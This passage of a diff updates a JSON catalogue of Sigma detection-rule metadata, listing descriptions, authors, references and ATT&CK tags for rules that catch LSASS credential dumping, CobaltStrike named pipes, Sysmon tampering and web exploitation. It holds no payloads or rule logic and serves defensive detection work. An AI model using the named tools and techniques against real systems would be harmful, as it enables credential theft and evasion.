"creation_date": "2021/10/06", + "author": "Bhabesh Raj (rule), @thefLinkk", + "creation_date": "2022/06/27", "falsepositive": [ "Unknown" ], - "filename": "web_iis_tilt_shortname_scan.yml", - "level": "medium", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/fuzzing/iis-shortname.yaml", - "https://www.exploit-db.com/exploits/19525", - "https://github.com/lijiejie/IIS_shortname_Scanner", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_iis_tilt_shortname_scan.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "7cb02516-6d95-4ffc-8eee-162075e111ac", - "value": "Successful IIS Shortname Fuzzing Scan" - }, - { - "description": "Detects possible Java payloads in web access logs", - "meta": { - "author": "frack113", - "creation_date": "2022/06/04", - "falsepositive": [ - "Legitimate apps" - ], - "filename": "web_java_payload_in_access_logs.yml", + "filename": "proc_access_win_handlekatz_lsass_access.yml", "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", + "logsource.category": "process_access", + "logsource.product": "windows", "refs": [ - "https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/", - "https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/", - "https://github.com/httpvoid/writeups/blob/62d3751945289d088ccfdf4d0ffbf61598a2cd7d/Confluence-RCE.md", - "https://twitter.com/httpvoid0x2f/status/1532924261035384832", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_java_payload_in_access_logs.yml" + "https://github.com/codewhitesec/HandleKatz", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_handlekatz_lsass_access.yml" ], "tags": [ - "cve.2022.26134", - "cve.2021.26084" + 
"attack.execution", + "attack.t1106", + "attack.defense_evasion", + "attack.t1003.001" ] }, - "uuid": "583aa0a2-30b1-4d62-8bf3-ab73689efe6c", - "value": "Java Payload Strings" + "uuid": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", + "value": "HandleKatz Duplicating LSASS Handle" }, { - "description": "Detects exploitation attempt using the JDNIExploiit Kit", + "description": "Detects a possible process memory dump based on a keyword in the file name of the accessing process", "meta": { "author": "Florian Roth", - "creation_date": "2021/12/12", + "creation_date": "2022/02/10", "falsepositive": [ - "Legitimate apps the use these paths" + "Rare programs that contain the word dump in their name and access lsass" ], - "filename": "web_jndi_exploit.yml", + "filename": "proc_access_win_lsass_memdump_indicators.yml", "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", + "logsource.category": "process_access", + "logsource.product": "windows", "refs": [ - "https://github.com/pimps/JNDI-Exploit-Kit", - "https://githubmemory.com/repo/FunctFan/JNDIExploit", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_jndi_exploit.yml" + "https://twitter.com/_xpn_/status/1491557187168178176", + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump_indicators.yml" ], - "tags": "No established tags" + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" + ] }, - "uuid": "412d55bc-7737-4d25-9542-5b396867ce55", - "value": "JNDIExploit Pattern" + "uuid": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", + "value": "LSASS Memory Access by Tool Named Dump" }, { - "description": "Detects possible exploitation activity or bugs in a web application", + "description": "Detects the use of SysmonEnte, a tool to attack the integrity of 
Sysmon", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/09/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_access_win_hack_sysmonente.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://github.com/codewhitesec/SysmonEnte/blob/main/screens/1.png", + "https://github.com/codewhitesec/SysmonEnte/", + "https://codewhitesec.blogspot.com/2022/09/attacks-on-sysmon-revisited-sysmonente.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_hack_sysmonente.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ] + }, + "uuid": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", + "value": "SysmonEnte Usage" + }, + { + "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_access_win_cobaltstrike_bof_injection_pattern.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://github.com/boku7/spawn", + "https://github.com/boku7/injectAmsiBypass", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cobaltstrike_bof_injection_pattern.yml" + ], + "tags": [ + "attack.execution", + "attack.t1106", + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "09706624-b7f6-455d-9d02-adee024cee1d", + "value": "CobaltStrike BOF Injection Pattern" + }, + { + "description": "Detects suspicious access to Lsass handle via a call trace to \"seclogon.dll\"", + "meta": { + "author": "Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (sigma)", + "creation_date": "2022/06/29", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_access_win_susp_seclogon.yml", + "level": "high", + "logsource.category": "process_access", + 
"logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1541920424635912196", + "https://github.com/elastic/detection-rules/blob/2bc1795f3d7bcc3946452eb4f07ae799a756d94e/rules/windows/credential_access_lsass_handle_via_malseclogon.toml", + "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_seclogon.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "472159c5-31b9-4f56-b794-b766faa8b0a7", + "value": "Suspicious LSASS Access Via MalSecLogon" + }, + { + "description": "Triggers on any Sysmon file block executable event. Which should indicates a violation of the block policy set", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/16", + "falsepositive": [ + "Unlikely" + ], + "filename": "sysmon_file_block_exe.yml", + "level": "high", + "logsource.category": "file_block", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@olafhartong/sysmon-14-0-fileblockexecutable-13d7ba3dff3e", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_file_block_exe.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "23b71bc5-953e-4971-be4c-c896cda73fc2", + "value": "Sysmon Blocked Executable" + }, + { + "description": "Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying manipulate the configuration", + "meta": { + "author": "frack113", + "creation_date": "2022/01/12", + "falsepositive": [ + "Legitimate administrative action" + ], + "filename": "sysmon_config_modification.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "8ac03a65-6c84-4116-acad-dc1558ff7a77", + "value": "Sysmon Configuration Change" + }, + { + "description": "Detects when a memory process image does not match the disk image, indicative of process hollowing.", + "meta": { + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S", + "creation_date": "2022/01/25", + "falsepositive": [ + "There are no known false positives at this time" + ], + "filename": "sysmon_process_hollowing.yml", + "level": "high", + "logsource.category": "process_tampering", + "logsource.product": "windows", + "refs": [ + "https://www.bleepingcomputer.com/news/microsoft/microsoft-sysmon-now-detects-malware-process-tampering-attempts/", + "https://twitter.com/SecurePeacock/status/1486054048390332423?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_process_hollowing.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.012" + ] + }, + "uuid": "c4b890e5-8d8c-4496-8c66-c805753817cd", + "value": "Sysmon Process Hollowing Detection" + }, + { + "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", + "meta": { + "author": "frack113", + "creation_date": "2021/06/04", + "falsepositive": [ + "Legitimate administrative action" + ], + "filename": "sysmon_config_modification_error.yml", + "level": "high", + "logsource.category": "sysmon_error", + "logsource.product": "windows", + "refs": [ + "https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_error.yml" + ], + "tags": [ + 
"attack.defense_evasion", + "attack.t1564" + ] + }, + "uuid": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", + "value": "Sysmon Configuration Error" + }, + { + "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", + "meta": { + "author": "frack113", + "creation_date": "2021/06/04", + "falsepositive": [ + "Legitimate administrative action" + ], + "filename": "sysmon_config_modification_status.yml", + "level": "high", + "logsource.category": "sysmon_status", + "logsource.product": "windows", + "refs": [ + "https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_status.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564" + ] + }, + "uuid": "1f2b5353-573f-4880-8e33-7d04dcf97744", + "value": "Sysmon Configuration Modification" + }, + { + "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", + "meta": { + "author": "Florian Roth, Christian Burkard", + "creation_date": "2021/07/30", + "falsepositive": [ + "Chrome instances using the exact same pipe name \"mojo.something\"" + ], + "filename": "pipe_created_susp_cobaltstrike_pipe_patterns.yml", + "level": "high", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752", + "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", + "value": "CobaltStrike Named Pipe 
Patterns" + }, + { + "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/07/30", + "falsepositive": [ + "Unknown" + ], + "filename": "pipe_created_mal_cobaltstrike_re.yml", + "level": "critical", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752", + "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_cobaltstrike_re.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", + "value": "CobaltStrike Named Pipe Pattern Regex" + }, + { + "description": "Detects well-known credential dumping tools execution via specific named pipes", + "meta": { + "author": "Teymur Kheirkhabarov, oscd.community", + "creation_date": "2019/11/01", + "falsepositive": [ + "Legitimate Administrator using tool for password recovery" + ], + "filename": "pipe_created_cred_dump_tools_named_pipes.yml", + "level": "critical", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_cred_dump_tools_named_pipes.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005" + ] + }, + "uuid": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", + "value": "Cred Dump-Tools Named Pipes" + }, + { + "description": "Detects the creation of a named pipe as used by CobaltStrike", + "meta": { + "author": "Florian Roth, Wojciech Lesicki", + "creation_date": 
"2021/05/25", + "falsepositive": [ + "Unknown" + ], + "filename": "pipe_created_mal_cobaltstrike.yml", + "level": "critical", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/253", + "https://twitter.com/d4rksystem/status/1357010969264873472", + "https://redcanary.com/threat-detection-report/threats/cobalt-strike/", + "https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis/", + "https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_cobaltstrike.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", + "value": "CobaltStrike Named Pipe" + }, + { + "description": "Detects a named pipe used by Turla group samples", + "meta": { + "author": "Markus Neis", + "creation_date": "2017/11/06", + "falsepositive": [ + "Unknown" + ], + "filename": "pipe_created_apt_turla_namedpipes.yml", + "level": "critical", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://attack.mitre.org/groups/G0010/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_apt_turla_namedpipes.yml" + ], + "tags": [ + "attack.g0010", + "attack.execution", + "attack.t1106" + ] + }, + "uuid": "739915e4-1e70-4778-8b8a-17db02f66db1", + "value": "Turla Group Named Pipes" + }, + { + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "creation_date": "2019/09/12", + "falsepositive": [ + "Programs using PowerShell directly without invocation of a dedicated interpreter." 
+ ], + "filename": "pipe_created_alternate_powershell_hosts_pipe.yml", + "level": "medium", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_alternate_powershell_hosts_pipe.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "58cb02d5-78ce-4692-b3e1-dce850aae41a", + "value": "Alternate PowerShell Hosts Pipe" + }, + { + "description": "Detects creation of default named pipe used by the DiagTrackEoP POC", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/03", + "falsepositive": [ + "Unlikely" + ], + "filename": "pipe_created_diagtrack_eop_default_pipe.yml", + "level": "critical", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L22", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_diagtrack_eop_default_pipe.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + "uuid": "1f7025a6-e747-4130-aac4-961eb47015f1", + "value": "DiagTrackEoP Default Named Pipe" + }, + { + "description": "Detects PAExec default named pipe", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/26", + "falsepositive": [ + "Unknown" + ], + "filename": "pipe_created_paexec_default_pipe.yml", + "level": "medium", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Command%20and%20Control/C2-NamedPipe.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_paexec_default_pipe.yml" + ], + "tags": [ + "attack.execution", + 
"attack.t1569.002" + ] + }, + "uuid": "f6451de4-df0a-41fa-8d72-b39f54a08db5", + "value": "PAExec Default Named Pipe" + }, + { + "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/09/01", + "falsepositive": [ + "Unknown" + ], + "filename": "pipe_created_susp_wmi_consumer_namedpipe.yml", + "level": "high", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://github.com/RiccardoAncarani/LiquidSnake", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_wmi_consumer_namedpipe.yml" + ], + "tags": [ + "attack.t1047", + "attack.execution" + ] + }, + "uuid": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", + "value": "WMI Event Consumer Created Named Pipe" + }, + { + "description": "Detects execution of PowerShell via creation of named pipe starting with PSHost", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2019/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "pipe_created_powershell_execution_pipe.yml", + "level": "informational", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_powershell_execution_pipe.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "ac7102b4-9e1e-4802-9b4f-17c5524c015c", + "value": "PowerShell Execution Via Named Pipe" + }, + { + "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. 
Which could indicate that the tool is being used in an attack", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/04", + "falsepositive": [ + "Rare legitimate use of psexec from the locations mentioned above" + ], + "filename": "pipe_created_psexec_default_pipe_from_susp_location.yml", + "level": "high", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet", + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_psexec_default_pipe_from_susp_location.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ] + }, + "uuid": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", + "value": "PsExec Tool Execution From Suspicious Locations - PipeName" + }, + { + "description": "Detects the pattern of a pipe name as used by the tool EfsPotato", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "pipe_created_efspotato_namedpipe.yml", + "level": "high", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://github.com/zcgonvh/EfsPotato", + "https://twitter.com/SBousseaden/status/1429530155291193354?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_efspotato_namedpipe.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", + "value": "EfsPotato Named Pipe" + }, + { + "description": "Detecting use PsExec via Pipe Creation/Access to pipes", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/05/10", + "falsepositive": [ + "Legitimate Administrator activity" + ], + "filename": "pipe_created_psexec_pipes_artifacts.yml", + "level": "medium", + "logsource.category": 
"pipe_created", + "logsource.product": "windows", + "refs": [ + "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_psexec_pipes_artifacts.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002", + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "9e77ed63-2ecf-4c7b-b09d-640834882028", + "value": "PsExec Pipes Artifacts" + }, + { + "description": "Detects the creation of a named pipe used by known APT malware", + "meta": { + "author": "Florian Roth, blueteam0ps, elhoim", + "creation_date": "2017/11/06", + "falsepositive": [ + "Unknown" + ], + "filename": "pipe_created_mal_namedpipes.yml", + "level": "critical", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://www.us-cert.gov/ncas/alerts/TA17-117A", + "https://thedfirreport.com/2020/06/21/snatch-ransomware/", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a", + "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", + "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf", + "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", + "https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/", + "https://securelist.com/faq-the-projectsauron-apt/75533/", + "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity", + "https://github.com/RiccardoAncarani/LiquidSnake", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_namedpipes.yml" + 
], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", + "value": "Malicious Named Pipe" + }, + { + "description": "Detects PsExec service installation and execution events (service and Sysmon)", "meta": { "author": "Thomas Patzke", - "creation_date": "2017/02/19", - "falsepositive": [ - "Unstable application", - "Application that misuses the response codes" - ], - "filename": "web_multiple_susp_resp_codes_single_source.yml", - "level": "medium", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_multiple_susp_resp_codes_single_source.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "6fdfc796-06b3-46e8-af08-58f3505318af", - "value": "Multiple Suspicious Resp Codes Caused by Single Client" - }, - { - "description": "Detects a core dump of a crashing Nginx worker process, which could be a signal of a serious problem or exploitation attempts.", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/05/31", - "falsepositive": [ - "Serious issues with a configuration or plugin" - ], - "filename": "web_nginx_core_dump.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "No established product", - "refs": [ - "https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps", - "https://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_nginx_core_dump.yml" - ], - "tags": [ - "attack.impact", - "attack.t1499.004" - ] - }, - "uuid": "59ec40bb-322e-40ab-808d-84fa690d7e56", - "value": "Nginx Core Dump" - }, - { - "description": "Detects path traversal exploitation attempts", - "meta": { - "author": "Subhash Popuri (@pbssubhash), Florian Roth (generalisation)", - "creation_date": 
"2021/09/25", - "falsepositive": [ - "Happens all the time on systems exposed to the Internet", - "Internal vulnerability scanners" - ], - "filename": "web_path_traversal_exploitation_attempt.yml", - "level": "medium", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://github.com/projectdiscovery/nuclei-templates", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_path_traversal_exploitation_attempt.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "7745c2ea-24a5-4290-b680-04359cb84b35", - "value": "Path Traversal Exploitation Attempts" - }, - { - "description": "Detects access to SUPERNOVA webshell as described in Guidepoint report", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/12/17", + "creation_date": "2017/06/12", "falsepositive": [ "Unknown" ], - "filename": "web_solarwinds_supernova_webshell.yml", + "filename": "pipe_created_psexec_default_pipe.yml", + "level": "low", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet", + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_psexec_default_pipe.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ] + }, + "uuid": "f3f3a972-f982-40ad-b63c-bca6afdfad7c", + "value": "PsExec Default Named Pipe" + }, + { + "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2021/10/08", + "falsepositive": [ + "Processes in the filter condition" + ], + "filename": 
"pipe_created_susp_adfs_namedpipe_connection.yml", + "level": "high", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://o365blog.com/post/adfs/", + "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/ADFSDBNamedPipeConnection.yaml", + "https://github.com/Azure/SimuLand", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_adfs_namedpipe_connection.yml" + ], + "tags": [ + "attack.collection", + "attack.t1005" + ] + }, + "uuid": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", + "value": "ADFS Database Named Pipe Connection" + }, + { + "description": "Detects creation of default named pipes used by the Koh tool", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/08", + "falsepositive": [ + "Unlikely" + ], + "filename": "pipe_created_koh_default_pipe.yml", "level": "critical", - "logsource.category": "webserver", - "logsource.product": "No established product", + "logsource.category": "pipe_created", + "logsource.product": "windows", "refs": [ - "https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/", - "https://www.anquanke.com/post/id/226029", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_solarwinds_supernova_webshell.yml" + "https://github.com/GhostPack/Koh/blob/0283d9f3f91cf74732ad377821986cfcb088e20a/Clients/BOF/KohClient.c#L12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_koh_default_pipe.yml" ], "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1528", + "attack.t1134.001" ] }, - "uuid": "a2cee20b-eacc-459f-861d-c02e5d12f1db", - "value": "Solarwinds SUPERNOVA Webshell Access" - }, - { - "description": "Detects exploitation attempts of the SonicWall Jarrewrite Exploit", - "meta": { - "author": "Florian Roth", - "creation_date": 
"2021/01/25", - "falsepositive": [ - "Unknown" - ], - "filename": "web_sonicwall_jarrewrite_exploit.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_sonicwall_jarrewrite_exploit.yml" - ], - "tags": [ - "attack.t1190", - "attack.initial_access" - ] - }, - "uuid": "6f55f047-112b-4101-ad32-43913f52db46", - "value": "SonicWall SSL/VPN Jarrewrite Exploit" - }, - { - "description": "Detects source code enumeration that use GET requests by keyword searches in URL strings", - "meta": { - "author": "James Ahearn", - "creation_date": "2019/06/08", - "falsepositive": [ - "Unknown" - ], - "filename": "web_source_code_enumeration.yml", - "level": "medium", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://pentester.land/tutorials/2018/10/25/source-code-disclosure-via-exposed-git-folder.html", - "https://medium.com/@logicbomb_1/bugbounty-how-i-was-able-to-download-the-source-code-of-indias-largest-telecom-service-52cf5c5640a1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_source_code_enumeration.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1083" - ] - }, - "uuid": "953d460b-f810-420a-97a2-cfca4c98e602", - "value": "Source Code Enumeration Detection by Keyword" - }, - { - "description": "Detects SQL Injection attempts via GET requests in access logs", - "meta": { - "author": "Saw Win Naung, Nasreddine Bencherchali", - "creation_date": "2020/02/22", - "falsepositive": [ - "Java scripts and CSS Files", - "User searches in search boxes of the respective website", - "Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as \"User Agent\" strings and more response codes" - ], - "filename": 
"web_sql_injection_in_access_logs.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/", - "https://www.acunetix.com/blog/articles/using-logs-to-investigate-a-web-application-attack/", - "https://brightsec.com/blog/sql-injection-payloads/", - "https://github.com/payloadbox/sql-injection-payload-list", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_sql_injection_in_access_logs.yml" - ], - "tags": "No established tags" - }, - "uuid": "5513deaf-f49a-46c2-a6c8-3f111b5cb453", - "value": "SQL Injection Strings" - }, - { - "description": "Detects SSTI attempts sent via GET requests in access logs", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/14", - "falsepositive": [ - "User searches in search boxes of the respective website", - "Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as \"User Agent\" strings and more response codes" - ], - "filename": 